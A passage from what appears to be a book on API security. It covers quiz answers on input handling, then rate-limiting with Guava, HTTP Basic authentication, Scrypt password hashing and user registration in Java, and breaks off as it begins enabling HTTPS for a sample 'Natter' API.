  b Include un-sanitized input values in error messages.
  c Produce output using a well-tested JSON or XML library.
  d Ensure the Content-Type is correct on any default error responses.
  e Copy the Accept header directly to the Content-Type header in the response.

The answers are at the end of the chapter.
3 b. The attacker can get the program to allocate large byte arrays based on user input. For a Java int value, the maximum would be a 2GB array, which would probably allow the attacker to exhaust all available memory with a few requests. Although passing invalid values is an annoyance, recall from the start of section 2.5 that Java is a memory-safe language and so these will result in exceptions rather than insecure behavior.
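A defensive version of that code might bound the length before allocating anything; the 64 KB limit below is an arbitrary value chosen purely for illustration:

// MAX_MSG_SIZE is a hypothetical application-specific limit (64 KB here).
final int MAX_MSG_SIZE = 64 * 1024;
int msgLen = buf.getInt();
// Reject negative, oversized, or inconsistent lengths before allocating.
if (msgLen < 0 || msgLen > MAX_MSG_SIZE || msgLen > buf.remaining()) {
    throw new IllegalArgumentException("invalid message length");
}
byte[] msg = new byte[msgLen];
buf.get(msg);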
4 d. X-Content-Type-Options: nosniff instructs browsers to respect the Content-Type header on the response.
5 b and e. You should never include unsanitized input values in error messages, as this may allow an attacker to inject XSS scripts. You should also never copy the Accept header from the request into the Content-Type header of a response, but instead construct it from scratch based on the actual content type that was produced.
Summary

- SQL injection attacks can be avoided by using prepared statements and parameterized queries.
- Database users should be configured to have the minimum privileges they need to perform their tasks. If the API is ever compromised, this limits the damage that can be done.
- Inputs should be validated before use to ensure they match expectations. Regular expressions are a useful tool for input validation, but you should avoid ReDoS attacks.
- Even if your API does not produce HTML output, you should protect web browser clients from XSS attacks by ensuring correct JSON is produced with correct headers to prevent browsers misinterpreting responses as HTML.
- Standard HTTP security headers should be applied to all responses, to ensure that attackers cannot exploit ambiguity in how browsers process results. Make sure to double-check all error responses, as these are often forgotten.
3 Securing the Natter API

This chapter covers
- Authenticating users with HTTP Basic authentication
- Authorizing requests with access control lists
- Ensuring accountability through audit logging
- Mitigating denial of service attacks with rate-limiting

In the last chapter you learned how to develop the functionality of your API while avoiding common security flaws. In this chapter you'll go beyond basic functionality and see how proactive security mechanisms can be added to your API to ensure all requests are from genuine users and properly authorized. You'll protect the Natter API that you developed in chapter 2, applying effective password authentication using Scrypt, locking down communications with HTTPS, and preventing denial of service attacks using the Guava rate-limiting library.
3.1 Addressing threats with security controls
You'll protect the Natter API against common threats by applying some basic security mechanisms (also known as security controls). Figure 3.1 shows the new mechanisms that you'll develop, and you can relate each of them to a STRIDE threat (chapter 1) that they prevent:

- Rate-limiting is used to prevent users overwhelming your API with requests, limiting denial of service threats.
- Encryption ensures that data is kept confidential when sent to or from the API and when stored on disk, preventing information disclosure. Modern encryption also prevents data being tampered with.
- Authentication makes sure that users are who they say they are, preventing spoofing. This is essential for accountability, but also a foundation for other security controls.
- Audit logging is the basis for accountability, to prevent repudiation threats.
- Finally, you'll apply access control to preserve confidentiality and integrity, preventing information disclosure, tampering, and elevation of privilege attacks.
Figure 3.1 Applying security controls to the Natter API. Encryption prevents information disclosure. Rate-limiting protects availability. Authentication is used to ensure that users are who they say they are. Audit logging records who did what, to support accountability. Access control is then applied to enforce integrity and confidentiality.

NOTE An important detail, shown in figure 3.1, is that only rate-limiting and access control directly reject requests. A failure in authentication does not immediately cause a request to fail, but a later access control decision may reject a request if it is not authenticated. This is important because we want to ensure that even failed requests are logged, which they would not be if the authentication process immediately rejected unauthenticated requests.
Together these five basic security controls address the six basic STRIDE threats of
spoofing, tampering, repudiation, information disclosure, denial of service, and eleva-
tion of privilege that were discussed in chapter 1. Each security control is discussed
and implemented in the rest of this chapter.
3.2 Rate-limiting for availability
Threats against availability, such as denial of service (DoS) attacks, can be very difficult to prevent entirely. Such attacks are often carried out using hijacked computing resources, allowing an attacker to generate large amounts of traffic with little cost to themselves. Defending against a DoS attack, on the other hand, can require significant resources, costing time and money. But there are several basic steps you can take to reduce the opportunity for DoS attacks.

DEFINITION A Denial of Service (DoS) attack aims to prevent legitimate users from accessing your API. This can include physical attacks, such as unplugging network cables, but more often involves generating large amounts of traffic to overwhelm your servers. A distributed DoS (DDoS) attack uses many machines across the internet to generate traffic, making it harder to block than a single bad client.

Many DoS attacks are carried out using unauthenticated requests. One simple way to limit these kinds of attacks is to never let unauthenticated requests consume resources on your servers. Authentication is covered in section 3.3 and should be applied immediately after rate-limiting, before any other processing. However, authentication itself can be expensive, so this doesn't eliminate DoS threats on its own.

NOTE Never allow unauthenticated requests to consume significant resources on your server.
Many DDoS attacks rely on some form of amplification so that an unauthenticated request to one API results in a much larger response that can be directed at the real target. A popular example is DNS amplification attacks, which take advantage of the unauthenticated Domain Name System (DNS) that maps host and domain names into IP addresses. By spoofing the return address for a DNS query, an attacker can trick the DNS server into flooding the victim with responses to DNS requests that they never sent. If enough DNS servers can be recruited into the attack, then a very large amount of traffic can be generated from a much smaller amount of request traffic, as shown in figure 3.2. By sending requests from a network of compromised machines (known as a botnet), the attacker can generate very large amounts of traffic to the victim at little cost to themselves. DNS amplification is an example of a network-level DoS attack. These attacks can be mitigated by filtering out harmful traffic entering your network using a firewall. Very large attacks can often only be handled by specialist DoS protection services provided by companies that have enough network capacity to handle the load.
TIP Amplification attacks usually exploit weaknesses in protocols based on UDP (User Datagram Protocol), which are popular in the Internet of Things (IoT). Securing IoT APIs is covered in chapters 12 and 13.
Network-level DoS attacks can be easy to spot because the traffic is unrelated to legitimate requests to your API. Application-layer DoS attacks attempt to overwhelm an API by sending valid requests, but at much higher rates than a normal client. A basic defense against application-layer DoS attacks is to apply rate-limiting to all requests, ensuring that you never attempt to process more requests than your server can handle. It is better to reject some requests in this case, than to crash trying to process everything. Genuine clients can retry their requests later when the system has returned to normal.

DEFINITION Application-layer DoS attacks (also known as layer-7 or L7 DoS) send syntactically valid requests to your API but try to overwhelm it by sending a very large volume of requests.
Rate-limiting should be the very first security decision made when a request reaches
your API. Because the goal of rate-limiting is ensuring that your API has enough
resources to be able to process accepted requests, you need to ensure that requests
that exceed your API’s capacities are rejected quickly and very early in processing.
Other security controls, such as authentication, can use significant resources, so rate-
limiting must be applied before those processes, as shown in figure 3.3.
Figure 3.2 In a DNS amplification attack, the attacker sends the same DNS query to many DNS servers, spoofing their IP address to look like the request came from the victim. By carefully choosing the DNS query, the server can be tricked into replying with much more data than was in the original query, flooding the victim with traffic.
TIP You should implement rate-limiting as early as possible, ideally at a load balancer or reverse proxy before requests even reach your API servers. Rate-limiting configuration varies from product to product. See https://medium.com/faun/understanding-rate-limiting-on-haproxy-b0cf500310b1 for an example of configuring rate-limiting for the open source HAProxy load balancer.
3.2.1 Rate-limiting with Guava
Often rate-limiting is applied at a reverse proxy, API gateway, or load balancer before the request reaches the API, so that it can be applied to all requests arriving at a cluster of servers. By handling this at a proxy server, you also avoid excess load being generated on your application servers. In this example you'll apply simple rate-limiting in the API server itself using Google's Guava library. Even if you enforce rate-limiting at a proxy server, it is good security practice to also enforce rate limits in each server so that if the proxy server misbehaves or is misconfigured, it is still difficult to bring down the individual servers. This is an instance of the general security principle known as defense in depth, which aims to ensure that no failure of a single mechanism is enough to compromise your API.

DEFINITION The principle of defense in depth states that multiple layers of security defenses should be used so that a failure in any one layer is not enough to breach the security of the whole system.
Figure 3.3 Rate-limiting rejects requests when your API is under too much load. By rejecting requests early before they have consumed too many resources, we can ensure that the requests we do process have enough resources to complete without errors. Rate-limiting should be the very first decision applied to incoming requests.

As you'll now discover, there are libraries available to make basic rate-limiting very easy to add to your API, while more complex requirements can be met with off-the-shelf
proxy/gateway products. Open the pom.xml file in your editor and add the following
dependency to the dependencies section:
<dependency>
<groupId>com.google.guava</groupId>
<artifactId>guava</artifactId>
<version>29.0-jre</version>
</dependency>
Guava makes it very simple to implement rate-limiting using the RateLimiter class that allows us to define the rate of requests per second you want to allow.1 You can then either block and wait until the rate reduces, or you can simply reject the request as we do in the next listing. The standard HTTP 429 Too Many Requests status code2 can be used to indicate that rate-limiting has been applied and that the client should try the request again later. You can also send a Retry-After header to indicate how many seconds the client should wait before trying again. Set a low limit of 2 requests per second to make it easy to see it in action. The rate limiter should be the very first filter defined in your main method, because even authentication and audit logging may consume resources.

1 The RateLimiter class is marked as unstable in Guava, so it may change in future versions.
2 Some services return a 503 Service Unavailable status instead. Either is acceptable, but 429 is more accurate, especially if you perform per-client rate-limiting.

TIP The rate limit for individual servers should be a fraction of the overall rate limit you want your service to handle. If your service needs to handle a thousand requests per second, and you have 10 servers, then the per-server rate limit should be around 100 requests per second. You should verify that each server is able to handle this maximum rate.
Open the Main.java file in your editor and add an import for Guava to the top of
the file:
import com.google.common.util.concurrent.*;
Then, in the main method, after initializing the database and constructing the control-
ler objects, add the code in the listing 3.1 to create the RateLimiter object and add a
filter to reject any requests once the rate limit has been exceeded. We use the non-
blocking tryAcquire() method that returns false if the request should be rejected.
Listing 3.1
Applying rate-limiting with Guava

// Create the shared rate limiter object and allow just
// 2 API requests per second.
var rateLimiter = RateLimiter.create(2.0d);
before((request, response) -> {
    // Check if the rate has been exceeded.
    if (!rateLimiter.tryAcquire()) {
        // If so, add a Retry-After header indicating when the
        // client should retry.
        response.header("Retry-After", "2");
        // Return a 429 Too Many Requests status.
        halt(429);
    }
});
Guava's rate limiter is quite basic, defining only a simple requests-per-second rate. It has additional features, such as being able to consume more permits for more expensive API operations, as in the sketch below. It lacks more advanced features, such as being able to cope with occasional bursts of activity, but it's perfectly fine as a basic defensive measure that can be incorporated into an API in a few lines of code.
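For example, a minimal sketch of weighting a more expensive operation might consume several permits per call; the /search route here is hypothetical and not part of the Natter API:

// A hypothetical expensive endpoint that consumes 5 permits per
// request instead of 1, so it is throttled more aggressively.
before("/search", (request, response) -> {
    if (!rateLimiter.tryAcquire(5)) {
        response.header("Retry-After", "2");
        halt(429);
    }
});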
You can try it out on the command line to see it in action:
$ for i in {1..5}
> do
> curl -i -d "{\"owner\":\"test\",\"name\":\"space$i\"}"
➥ -H 'Content-Type: application/json'
➥ http://localhost:4567/spaces;
> done
HTTP/1.1 201 Created
Date: Wed, 06 Feb 2019 21:07:21 GMT
Location: /spaces/1
Content-Type: application/json;charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 0
Cache-Control: no-store
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; sandbox
Server:
Transfer-Encoding: chunked
HTTP/1.1 201 Created
Date: Wed, 06 Feb 2019 21:07:21 GMT
Location: /spaces/2
Content-Type: application/json;charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 0
Cache-Control: no-store
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; sandbox
Server:
Transfer-Encoding: chunked
HTTP/1.1 201 Created
Date: Wed, 06 Feb 2019 21:07:22 GMT
Location: /spaces/3
Content-Type: application/json;charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 0
Cache-Control: no-store
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; sandbox
Server:
Transfer-Encoding: chunked
The first requests succeed while the rate limit is not exceeded.
HTTP/1.1 429 Too Many Requests
Date: Wed, 06 Feb 2019 21:07:22 GMT
Content-Type: application/json;charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 0
Cache-Control: no-store
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; sandbox
Server:
Transfer-Encoding: chunked
HTTP/1.1 429 Too Many Requests
Date: Wed, 06 Feb 2019 21:07:22 GMT
Content-Type: application/json;charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 0
Cache-Control: no-store
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; sandbox
Server:
Transfer-Encoding: chunked
Once the rate limit is exceeded, requests are rejected with a 429 status code.

By returning a 429 response immediately, you can limit the amount of work that your API is performing to the bare minimum, allowing it to use those resources for serving the requests that it can handle. The rate limit should always be set below what you think your servers can handle, to give some wiggle room.
Pop quiz

1 Which one of the following statements is true about rate-limiting?
  a Rate-limiting should occur after access control.
  b Rate-limiting stops all denial of service attacks.
  c Rate-limiting should be enforced as early as possible.
  d Rate-limiting is only needed for APIs that have a lot of clients.
2 Which HTTP response header can be used to indicate how long a client should wait before sending any more requests?
  a Expires
  b Retry-After
  c Last-Modified
  d Content-Security-Policy
  e Access-Control-Max-Age

The answers are at the end of the chapter.
3.3 Authentication to prevent spoofing
Almost all operations in our API need to know who is performing them. When you talk to a friend in real life, you recognize them based on their appearance and physical features. In the online world, such instant identification is not usually possible. Instead, we rely on people to tell us who they are. But what if they are not honest? For a social app, users may be able to impersonate each other to spread rumors and cause friends to fall out. For a banking API, it would be catastrophic if users could easily pretend to be somebody else and spend their money. Almost all security starts with authentication, which is the process of verifying that a user is who they say they are.
Figure 3.4 shows how authentication fits within the security controls that you’ll add
to the API in this chapter. Apart from rate-limiting (which is applied to all requests
regardless of who they come from), authentication is the first process we perform.
Downstream security controls, such as audit logging and access control, will almost
always need to know who the user is. It is important to realize that the authentication
phase itself shouldn’t reject a request even if authentication fails. Deciding whether
any particular request requires the user to be authenticated is the job of access control
(covered later in this chapter), and your API may allow some requests to be carried
out anonymously. Instead, the authentication process will populate the request with
attributes indicating whether the user was correctly authenticated that can be used by
these downstream processes.
Figure 3.4 Authentication occurs after rate-limiting but before audit logging or access control. All requests proceed, even if authentication fails, to ensure that they are always logged. Unauthenticated requests will be rejected during access control, which occurs after audit logging.
In the Natter API, a user makes a claim of identity in two places:

1 In the Create Space operation, the request includes an "owner" field that identifies the user creating the space.
2 In the Post Message operation, the user identifies themselves in the "author" field.

The operations to read messages currently don't identify who is asking for those messages at all, meaning that we can't tell if they should have access. You'll correct both problems by introducing authentication.
3.3.1 HTTP Basic authentication
There are many ways of authenticating a user, but one of the most widespread is sim-
ple username and password authentication. In a web application with a user interface,
we might implement this by presenting the user with a form to enter their username
and password. An API is not responsible for rendering a UI, so you can instead use the
standard HTTP Basic authentication mechanism to prompt for a password in a way
that doesn’t depend on any UI. This is a simple standard scheme, specified in RFC
7617 (https://tools.ietf.org/html/rfc7617), in which the username and password are
encoded (using Base64 encoding; https://en.wikipedia.org/wiki/Base64) and sent in
a header. An example of a Basic authentication header for the username demo and
password changeit is as follows:
Authorization: Basic ZGVtbzpjaGFuZ2VpdA==
The Authorization header is a standard HTTP header for sending credentials to the
server. It’s extensible, allowing different authentication schemes,3 but in this case
you’re using the Basic scheme. The credentials follow the authentication scheme
identifier. For Basic authentication, these consist of a string of the username followed
by a colon4 and then the password. The string is then converted into bytes (usually in
UTF-8, but the standard does not specify) and Base64-encoded, which you can see if
you decode it in jshell:
jshell> new String(
java.util.Base64.getDecoder().decode("ZGVtbzpjaGFuZ2VpdA=="), "UTF-8")
$3 ==> "demo:changeit"
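Going the other way, a client can construct the same header itself. The snippet below is an illustrative sketch using the JDK's Base64 encoder, not code from the Natter API:

import java.nio.charset.StandardCharsets;
import java.util.Base64;

// Join username and password with a colon, then Base64-encode the
// UTF-8 bytes to produce the Basic credentials.
var credentials = "demo" + ":" + "changeit";
var header = "Basic " + Base64.getEncoder().encodeToString(
        credentials.getBytes(StandardCharsets.UTF_8));
// header is now "Basic ZGVtbzpjaGFuZ2VpdA=="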
WARNING HTTP Basic credentials are easy to decode for anybody able to read network messages between the client and the server. You should only ever send passwords over an encrypted connection. You'll add encryption to the API communications in section 3.4.
3 The HTTP specifications unfortunately confuse the terms authentication and authorization. As you’ll see in
chapter 9, there are authorization schemes that do not involve authentication.
4 The username is not allowed to contain a colon.
3.3.2 Secure password storage with Scrypt
Web browsers have built-in support for HTTP Basic authentication (albeit with some quirks that you'll see later), as does curl and many other command-line tools. This allows us to easily send a username and password to the API, but you need to securely store and validate that password. A password hashing algorithm converts each password into a fixed-length random-looking string. When the user tries to log in, the password they present is hashed using the same algorithm and compared to the hash stored in the database. This allows the password to be checked without storing it directly. Modern password hashing algorithms, such as Argon2, Scrypt, Bcrypt, or PBKDF2, are designed to resist a variety of attacks in case the hashed passwords are ever stolen. In particular, they are designed to take a lot of time or memory to process to prevent brute-force attacks to recover the passwords. You'll use Scrypt in this chapter as it is secure and widely implemented.

DEFINITION A password hashing algorithm converts passwords into random-looking fixed-size values known as a hash. A secure password hash uses a lot of time and memory to slow down brute-force attacks such as dictionary attacks, in which an attacker tries a list of common passwords to see if any match the hash.
Locate the pom.xml file in the project and open it with your favorite editor. Add the
following Scrypt dependency to the dependencies section and then save the file:
<dependency>
<groupId>com.lambdaworks</groupId>
<artifactId>scrypt</artifactId>
<version>1.4.0</version>
</dependency>
TIP You may be able to avoid implementing password storage yourself by using an LDAP (Lightweight Directory Access Protocol) directory. LDAP servers often implement a range of secure password storage options. You can also outsource authentication to another organization using a federation protocol like SAML or OpenID Connect. OpenID Connect is discussed in chapter 7.
3.3.3 Creating the password database
Before you can authenticate any users, you need some way to register them. For now, you'll just allow any user to register by making a POST request to the /users endpoint, specifying their username and chosen password. You'll add this endpoint in section 3.3.4, but first let's see how to store user passwords securely in the database.

TIP In a real project, you could confirm the user's identity during registration (by sending them an email or validating their credit card, for example), or you might use an existing user repository and not allow users to self-register.
You’ll store users in a new dedicated database table, which you need to add to the
database schema. Open the schema.sql file under src/main/resources in your text
editor, and add the following table definition at the top of the file and save it:
CREATE TABLE users(
user_id VARCHAR(30) PRIMARY KEY,
pw_hash VARCHAR(255) NOT NULL
);
You also need to grant the natter_api_user permissions to read and insert into this
table, so add the following line to the end of the schema.sql file and save it again:
GRANT SELECT, INSERT ON users TO natter_api_user;
The table just contains the user id and their password hash. To store a new user, you
calculate the hash of their password and store that in the pw_hash column. In this
example, you’ll use the Scrypt library to hash the password and then use Dalesbred to
insert the hashed value into the database.
Scrypt takes several parameters to tune the amount of time and memory that it
will use. You do not need to understand these numbers, just know that larger num-
bers will use more CPU time and memory. You can use the recommended parame-
ters as of 2019 (see https://blog.filippo.io/the-scrypt-parameters/ for a discussion of
Scrypt parameters), which should take around 100ms on a single CPU and 32MiB
of memory:
String hash = SCryptUtil.scrypt(password, 32768, 8, 1);
This may seem an excessive amount of time and memory, but these parameters have
been carefully chosen based on the speed at which attackers can guess passwords.
Dedicated password cracking machines, which can be built for relatively modest
amounts of money, can try many millions or even billions of passwords per second.
The expensive time and memory requirements of secure password hashing algorithms
such as Scrypt reduce this to a few thousand passwords per second, hugely increasing
the cost for the attacker and giving users valuable time to change their passwords after
a breach is discovered. The latest NIST guidance on secure password storage (“memo-
rized secret verifiers” in the tortured language of NIST) recommends using strong
memory-hard hash functions such as Scrypt (https://pages.nist.gov/800-63-3/sp800-
63b.html#memsecret).
If you have particularly strict requirements on the performance of authentica-
tion to your system, then you can adjust the Scrypt parameters to reduce the time
and memory requirements to fit your needs. But you should aim to use the recom-
mended secure defaults until you know that they are causing an adverse impact on
performance. You should consider using other authentication methods if secure
password processing is too expensive for your application. Although there are protocols that allow offloading the cost of password hashing to the client, such as SCRAM (https://tools.ietf.org/html/rfc5802) or OPAQUE (https://blog.cryptographyengineering.com/2018/10/19/lets-talk-about-pake/), this is hard to do securely, so you should consult an expert before implementing such a solution.

PRINCIPLE Establish secure defaults for all security-sensitive algorithms and parameters used in your API. Only relax the values if there is no other way to achieve your non-security requirements.
3.3.4 Registering users in the Natter API
Listing 3.2 shows a new UserController class with a method for registering a user:

- First, you read the username and password from the input, making sure to validate them both as you learned in chapter 2.
- Then you calculate a fresh Scrypt hash of the password.
- Finally, store the username and hash together in the database, using a prepared statement to avoid SQL injection attacks.

Navigate to the folder src/main/java/com/manning/apisecurityinaction/controller in your editor and create a new file UserController.java. Copy the contents of the listing into the editor and save the new file.
Listing 3.2
Registering a new user

package com.manning.apisecurityinaction.controller;

import com.lambdaworks.crypto.*;
import org.dalesbred.*;
import org.json.*;
import spark.*;

import java.nio.charset.*;
import java.util.*;

import static spark.Spark.*;

public class UserController {
    private static final String USERNAME_PATTERN =
        "[a-zA-Z][a-zA-Z0-9]{1,29}";

    private final Database database;

    public UserController(Database database) {
        this.database = database;
    }

    public JSONObject registerUser(Request request,
            Response response) throws Exception {
        var json = new JSONObject(request.body());
        var username = json.getString("username");
        var password = json.getString("password");

        // Apply the same username validation that you used before.
        if (!username.matches(USERNAME_PATTERN)) {
            throw new IllegalArgumentException("invalid username");
        }
        if (password.length() < 8) {
            throw new IllegalArgumentException(
                "password must be at least 8 characters");
        }

        // Use the Scrypt library to hash the password, with the
        // recommended parameters for 2019.
        var hash = SCryptUtil.scrypt(password, 32768, 8, 1);
        // Use a prepared statement to insert the username and hash.
        database.updateUnique(
            "INSERT INTO users(user_id, pw_hash)" +
            " VALUES(?, ?)", username, hash);

        response.status(201);
        response.header("Location", "/users/" + username);
        return new JSONObject().put("username", username);
    }
}
The Scrypt library generates a unique random salt value for each password hash. The
hash string that gets stored in the database includes the parameters that were used
when the hash was generated, as well as this random salt value. This ensures that you
can always recreate the same hash in future, even if you change the parameters. The
Scrypt library will be able to read this value and decode the parameters when it veri-
fies the hash.
DEFINITION A salt is a random value that is mixed into the password when it is hashed. Salts ensure that the hash is always different even if two users have the same password. Without salts, an attacker can build a compressed database of common password hashes, known as a rainbow table, which allows passwords to be recovered very quickly.
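You can see the effect of the random salt for yourself, for example in jshell with the Scrypt library on the class path; this sketch (not from the book) hashes the same password twice and checks both results:

// Hashing the same password twice gives two different strings because
// each call generates a fresh random salt, yet both still verify.
var h1 = SCryptUtil.scrypt("changeit", 32768, 8, 1);
var h2 = SCryptUtil.scrypt("changeit", 32768, 8, 1);
System.out.println(h1.equals(h2));                    // false
System.out.println(SCryptUtil.check("changeit", h1)); // true
System.out.println(SCryptUtil.check("changeit", h2)); // true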
You can then add a new route for registering a new user to your Main class. Locate the
Main.java file in your editor and add the following lines just below where you previ-
ously created the SpaceController object:
var userController = new UserController(database);
post("/users", userController::registerUser);
3.3.5 Authenticating users
To authenticate a user, you’ll extract the username and password from the HTTP
Basic authentication header, look up the corresponding user in the database, and
finally verify the password matches the hash stored for that user. Behind the scenes,
the Scrypt library will extract the salt from the stored password hash, then hash the sup-
plied password with the same salt and parameters, and then finally compare the hashed
password with the stored hash. If they match, then the user must have presented the
same password and so authentication succeeds, otherwise it fails.
Listing 3.3 implements this check as a filter that is called before every API call. First
you check if there is an Authorization header in the request, with the Basic authenti-
cation scheme. Then, if it is present, you can extract and decode the Base64-encoded
credentials. Validate the username as always and look up the user from the database.
Finally, use the Scrypt library to check whether the supplied password matches the
hash stored for the user in the database. If authentication succeeds, then you should
store the username in an attribute on the request so that other handlers can see it;
otherwise, leave it as null to indicate an unauthenticated user. Open the UserController
.java file that you previously created and add the authenticate method as given in the
listing.
Listing 3.3
Authenticating a request

public void authenticate(Request request, Response response) {
    // Check to see if there is an HTTP Basic Authorization header.
    var authHeader = request.headers("Authorization");
    if (authHeader == null || !authHeader.startsWith("Basic ")) {
        return;
    }

    // Decode the credentials using Base64 and UTF-8.
    var offset = "Basic ".length();
    var credentials = new String(Base64.getDecoder().decode(
        authHeader.substring(offset)), StandardCharsets.UTF_8);

    // Split the credentials into username and password.
    var components = credentials.split(":", 2);
    if (components.length != 2) {
        throw new IllegalArgumentException("invalid auth header");
    }

    var username = components[0];
    var password = components[1];
    if (!username.matches(USERNAME_PATTERN)) {
        throw new IllegalArgumentException("invalid username");
    }

    var hash = database.findOptional(String.class,
        "SELECT pw_hash FROM users WHERE user_id = ?", username);

    // If the user exists, then use the Scrypt library to check
    // the password.
    if (hash.isPresent() &&
            SCryptUtil.check(password, hash.get())) {
        request.attribute("subject", username);
    }
}
You can wire this into the Main class as a filter in front of all API calls. Open the
Main.java file in your text editor again, and add the following line to the main method
underneath where you created the userController object:
before(userController::authenticate);
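Downstream handlers can then read the authentication result from the request. The /whoami route below is a hypothetical sketch for illustration, not part of the Natter API:

// The "subject" attribute is null for unauthenticated requests, so
// handlers can make their own decisions based on it.
get("/whoami", (request, response) -> {
    String subject = request.attribute("subject");
    return new JSONObject().put("subject",
        subject == null ? JSONObject.NULL : subject);
});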
You can now update your API methods to check that the authenticated user matches
any claimed identity in the request. For example, you can update the Create Space
operation to check that the owner field matches the currently authenticated user. This
also allows you to skip validating the username, because you can rely on the authenti-
cation service to have done that already. Open the SpaceController.java file in your
editor and change the createSpace method to check that the owner of the space
matches the authenticated subject, as in the following snippet:
public JSONObject createSpace(Request request, Response response) {
..
var owner = json.getString("owner");
var subject = request.attribute("subject");
if (!owner.equals(subject)) {
throw new IllegalArgumentException(
"owner must match authenticated user");
}
..
}
You could in fact remove the owner field from the request and always use the authen-
ticated user subject, but for now you’ll leave it as-is. You can do the same in the Post
Message operation in the same file:
var user = json.getString("author");
if (!user.equals(request.attribute("subject"))) {
throw new IllegalArgumentException(
"author must match authenticated user");
}
You’ve now enabled authentication for your API—every time a user makes a claim
about their identity, they are required to authenticate to provide proof of that claim.
You’re not yet enforcing authentication on all API calls, so you can still read messages
without being authenticated. You’ll tackle that shortly when you look at access control.
The checks we have added so far are part of the application logic. Now let’s try out
how the API works. First, let’s try creating a space without authenticating:
$ curl -d '{"name":"test space","owner":"demo"}'
➥ -H 'Content-Type: application/json' http://localhost:4567/spaces
{"error":"owner must match authenticated user"}
Good, that was prevented. Let’s use curl now to register a demo user:
$ curl -d '{"username":"demo","password":"password"}’'
➥ -H 'Content-Type: application/json' http://localhost:4567/users
{"username":"demo"}
Finally, you can repeat your Create Space request with correct authentication
credentials:
$ curl -u demo:password -d '{"name":"test space","owner":"demo"}'
➥ -H 'Content-Type: application/json' http://localhost:4567/spaces
{"name":"test space","uri":"/spaces/1"}
3.4 Using encryption to keep data private
Introducing authentication into your API protects against spoofing threats. However,
requests to the API, and responses from it, are not protected in any way, leading to
tampering and information disclosure threats. Imagine that you were trying to check
the latest gossip from your work party while connected to a public wifi hotspot in your
local coffee shop. Without encryption, the messages you send to and from the API will
be readable by anybody else connected to the same hotspot.
Your simple password authentication scheme is also vulnerable to this snooping, as an attacker with access to the network can simply read your Base64-encoded passwords as they go by. They can then impersonate any user whose password they have stolen. It’s often the case that threats are linked together in this way. An attacker can take advantage of one threat, in this case information disclosure from unencrypted communications, and exploit that to pretend to be somebody else, undermining your API’s authentication. Many successful real-world attacks result from chaining together multiple vulnerabilities rather than exploiting just one mistake.
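To see just how weak that encoding is, here is a minimal sketch (assuming the same Base64 and StandardCharsets imports as the authenticate method; the header value is the demo:password credentials used elsewhere in this chapter) showing that recovering a password from a captured Basic header requires nothing more than a Base64 decode:
var header = "Basic ZGVtbzpwYXNzd29yZA==";
// Base64 is an encoding, not encryption: no key or secret is needed.
var credentials = new String(Base64.getDecoder().decode(
    header.substring("Basic ".length())), StandardCharsets.UTF_8);
// credentials is now the string "demo:password".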
Pop quiz
3 Which of the following are desirable properties of a secure password hashing algorithm? (There may be several correct answers.)
a It should be easy to parallelize.
b It should use a lot of storage on disk.
c It should use a lot of network bandwidth.
d It should use a lot of memory (several MB).
e It should use a random salt for each password.
f It should use a lot of CPU power to try lots of passwords.
4 What is the main reason why HTTP Basic authentication should only be used over an encrypted communication channel such as HTTPS? (Choose one answer.)
a The password can be exposed in the Referer header.
b HTTPS slows down attackers trying to guess passwords.
c The password might be tampered with during transmission.
d Google penalizes websites in search rankings if they do not use HTTPS.
e The password can easily be decoded by anybody snooping on network traffic.
The answers are at the end of the chapter.
In this case, sending passwords in clear text is a pretty big vulnerability, so let’s fix
that by enabling HTTPS. HTTPS is normal HTTP, but the connection occurs over
Transport Layer Security (TLS), which provides encryption and integrity protection.
Once correctly configured, TLS is largely transparent to the API because it occurs at a
lower level in the protocol stack and the API still sees normal requests and responses.
Figure 3.5 shows how HTTPS fits into the picture, protecting the connections between
your users and the API.
In addition to protecting data in transit (on the way to and from our application), you
should also consider protecting any sensitive data at rest, when it is stored in your
application’s database. Many different people may have access to the database, as a
legitimate part of their job, or due to gaining illegitimate access to it through some
other vulnerability. For this reason, you should also consider encrypting private data
in the database, as shown in figure 3.5. In this chapter, we will focus on protecting
data in transit with HTTPS and discuss encrypting data in the database in chapter 5.
TLS or SSL?
Transport Layer Security (TLS) is a protocol that sits on top of TCP/IP and provides several basic security functions to allow secure communication between a client and a server. Early versions of TLS were known as the Secure Socket Layer, or SSL, and you’ll often still hear TLS referred to as SSL. Application protocols that use TLS often have an S appended to their name, for example HTTPS or LDAPS, to stand for “secure.”
TLS ensures confidentiality and integrity of data transmitted between the client and server. It does this by encrypting and authenticating all data flowing between the two parties. The first time a client connects to a server, a TLS handshake is performed in which the server authenticates to the client, to guarantee that the client connected to the server it wanted to connect to (and not to a server under an attacker’s control). Then fresh cryptographic keys are negotiated for this session and used to encrypt and authenticate every request and response from then on. You’ll look in depth at TLS and HTTPS in chapter 7.
Figure 3.5 Encryption is used to protect data in transit between a client and our API, and at rest when stored in the database. HTTPS is used to encrypt and protect data being transmitted (in transit) to and from your API; encryption should also be used to protect sensitive data at rest in the application database. Inside your API, requests and responses are unencrypted.
3.4.1 Enabling HTTPS
Enabling HTTPS support in Spark is straightforward. First, you need to generate a certificate that the API will use to authenticate itself to its clients. TLS certificates are covered in depth in chapter 7. When a client connects to your API it will use a URI that includes the hostname of the server the API is running on, for example api.example.com. The server must present a certificate, signed by a trusted certificate authority (CA), that says that it really is the server for api.example.com. If an invalid certificate is presented, or it doesn’t match the host that the client wanted to connect to, then the client will abort the connection. Without this step, the client might be tricked into connecting to the wrong server and then send its password or other confidential data to the imposter.
Because you’re enabling HTTPS for development purposes only, you could use a self-signed certificate. In later chapters you will connect to the API directly in a web browser, so it is much easier to use a certificate signed by a local CA; most web browsers do not like self-signed certificates. A tool called mkcert (https://mkcert.dev) simplifies the process considerably. Follow the instructions on the mkcert homepage to install it, and then run
mkcert -install
to generate the CA certificate and install it. The CA cert will automatically be marked
as trusted by web browsers installed on your operating system.
DEFINITION
